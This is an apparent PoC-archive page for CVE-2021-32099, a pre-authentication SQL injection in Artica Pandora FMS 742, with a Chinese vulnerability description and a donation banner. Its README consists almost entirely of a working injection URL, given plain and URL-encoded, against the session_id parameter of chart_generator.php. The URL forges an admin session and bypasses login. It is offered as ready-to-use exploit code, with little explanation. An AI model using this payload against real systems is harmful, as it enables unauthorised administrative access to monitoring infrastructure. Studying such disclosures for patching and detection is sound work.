Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-32099 PoC — Artica Pandora FMS SQL注入漏洞

Source
Associated Vulnerability
Title:Artica Pandora FMS SQL注入漏洞 (CVE-2021-32099)
Description:Artica Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。 Artica Pandora FMS 742 存在SQL注入漏洞,该漏洞允许未经身份验证的攻击者通过include chart generator.php会话id参数升级他的非特权会话,导致登录绕过。
Description
CVE-2021-32099
Readme
# CVE-2021-32099

## pandora fms 742 sqli (pre authentication) POC
```
http://localhost/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1
```

`URL Encoded`
```
http://localhost/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
```
File Snapshot

[4.0K] /data/pocs/0f3f1c7b082690f1547088533bbf28e41dd83a5b └── [ 456] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.